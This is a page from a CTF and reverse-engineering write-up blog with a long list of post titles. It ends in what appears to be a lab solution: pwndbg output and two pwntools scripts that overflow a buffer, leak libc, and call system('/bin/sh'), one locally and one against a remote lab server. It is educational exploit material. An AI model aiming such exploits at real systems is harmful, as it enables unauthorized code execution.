*Posts*

Hack the Box rev headache

Flare On challenges 1 and 2 2014-2022

La CTF stringcheese caterpillar finals-simulator ctfd-plus

IdekCtf 2022

Hack the Box pentest Shoppy

Hack the Box rev Spookylicence

Hack the Box rev Bombs Landed

Hack the Box pentest Photobomb

Hack the Box rev DebugMe

Hack the Box pentest Precious

Hack the Box rev Up a Stream

Hack the Box rev Golfer Part 1

Hack the Box rev Partial Encryption

Hack the Box rev Rauth

Hack the Box rev Exatlon

Hack the Box rev Bypass

Hack the Box rev Behind the Scenes

Hack the Box rev Simple Encryptor

Hack the Box rev Impossible Password

Hack the Box rev 0xdiablos

Pwnable rev shellshock

pwnable.kr rev mistake

Sunshine CTF rev middle-endian

pwnable rev leg

Hack the box pwn jeeves

Hack the Box rev hunting

pwnable.kr rev fd pwnable

Hack the Box rev batcomputer

Hack the Box rev HTB_RACECAR

STACK The Flags Quills of Power

STACK The Flags Hit you with that

STACK The Flags Cobalt Struck

Sunshine CTF 2022 Middle Endian

UNIBUC_RE_lab_7_task_2

UNIBUC_RE_lab_7_task_1

UNIBUC_RE_lab_6_task_4

UNIBUC_RE_lab_6_task_3

UNIBUC_RE_lab_6_task_2

UNIBUC_RE_lab_6_task_1

UNIBUC_RE_lab_5_task_4

UNIBUC_RE_lab_5_task_3

UNIBUC_RE_lab_5_task_2

UNIBUC_RE_lab_5_task_1

UNIBUC_RE_lab_2

UNIBUC_RE_lab_1_task01_windows

UNIBUC_RE_lab_1_task01_linux

MAPLECTF_22_flag_hoarding

MAPLECTF_22_disukoodo

warmup SHELLCTF 22

turbocrab

tea SHELLCTF 22

snakecode htb ctf ca 2022 python disassemble lambda pyc

simplewaf

server challenge aresx

secret document SHELLCTF 22

safepy

pulling the strings SHELLCTF22

keygen

indefinite reverse Ca 2022

how to defeat a dragon SHELLCTF 22

heysurfer's first crackme

heaven SHELLCTF 22

Without a Trace Reverse

Wide CA 2022 Reverse

Teleport Reverse Writeup CA 2022

Shuffle Me Reverse

Rebuilding Reverse

Rebasing an image

PopaCracker's Python CrackMe

Nuts and Bolts Reverse

Microsoft corctf2022

It's A Wrap Hack a Sat 3 2022

Intergalactic Recovery CA 2022 HTB CTF Forensics RAID 5 recovery

Ida python change data type script

HTB CA 2022 CTF seized forensics google chrome password extraction APPDATA masterkey john the ripper

Golden Persistence CA 2022 HTB CTF Registry Powershell

Front Door Crowdstrike Adversary Quest Writeup

Free Services Forensics

Freaky Forum Interception Reverse

f0rizen's find a real key

crackme learning c redxens

aktiun

Forensics Event viewer, Event monitor, Powershell CA 2022 monitor

Extracting an object from memory using Ida

Cheat sheet htb

CHFI11

CHFI-14

CHFI 2

CEH

BCACTF-BROKEN IMAGE

Automation Foresnsics PCAP analysis Powershell Scripts Wireshark

Adversary Machine Learning CTF Battle in OrIOn Cyber Apocalypse CTF2022

pwndbg> p puts
$1 = {int (const char *)} 0x7fe5836cd690 <_IO_puts>
pwndbg> p system
$2 = {int (const char *)} 0x7fe5836a3390 <__libc_system>

from pwn import *

from ctypes import *
e = ELF('./task02')
pop_rdi=0x40129b
bin_sh=0x40302a

io = process("./task02",env={"LD_PRELOAD" : "./libc.so"})
io.recvuntil("name")
gdb.attach(io,'break *0x40121C  ')
io.sendline(128*b'a'+8*b'x'+p64(e.symbols['leaky_function'])+p64(e.symbols['main']))
temp_recv=io.recvuntil('Puts is at address')
puts_address=int(io.recvline(),16)
print(hex(puts_address))
print('puts end ----')
system_address=puts_address-0x2a300
io.sendline(128*b'a'+8*b'x'+p64(pop_rdi)+p64(bin_sh)+ p64(system_address))


io.interactive()

from pwn import *

from ctypes import *
e = ELF('./task02')
pop_rdi=0x40129b
bin_sh=0x40302a


#io = process("./task02",env={"LD_PRELOAD" : "./libc.so"})
io=remote('45.76.91.112',10062)
io.recvuntil("name")
#gdb.attach(io,'break *0x40121C  ')
io.sendline(128*b'a'+8*b'x'+p64(e.symbols['leaky_function'])+p64(e.symbols['main']))
temp_recv=io.recvuntil('Puts is at address')
puts_address=int(io.recvline(),16)
print(hex(puts_address))
print('puts end ----')
system_address=puts_address-0x2a300
io.sendline(128*b'a'+8*b'x'+p64(pop_rdi)+p64(bin_sh)+ p64(system_address))


io.interactive()